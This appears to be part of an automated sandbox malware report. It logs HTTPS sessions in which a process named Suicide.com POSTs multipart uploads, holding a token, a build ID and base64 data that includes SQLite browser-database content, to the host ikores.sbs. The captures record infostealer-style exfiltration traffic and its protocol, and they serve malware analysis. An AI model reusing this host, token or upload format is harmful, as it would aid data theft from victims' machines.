                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------LX4EUSR1N7QQIMGVASR9Content-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------LX4EUSR1N7QQIMGVASR9Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------LX4EUSR1N7QQIMGVASR9Cont
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:32 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                    Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                    2024-12-06 08:42:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:33 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    17192.168.2.4498915.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:33 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----LX4EUSR1N7QQIMGVASR9
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 66001
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------LX4EUSR1N7QQIMGVASR9Content-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------LX4EUSR1N7QQIMGVASR9Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------LX4EUSR1N7QQIMGVASR9Cont
                                                                                                                                                                                    2024-12-06 08:42:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:33 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:34 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    18192.168.2.4498995.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:36 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----SR1N7YM7GVAAIE3O8Q90
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 153381
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------SR1N7YM7GVAAIE3O8Q90Content-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------SR1N7YM7GVAAIE3O8Q90Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------SR1N7YM7GVAAIE3O8Q90Cont
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
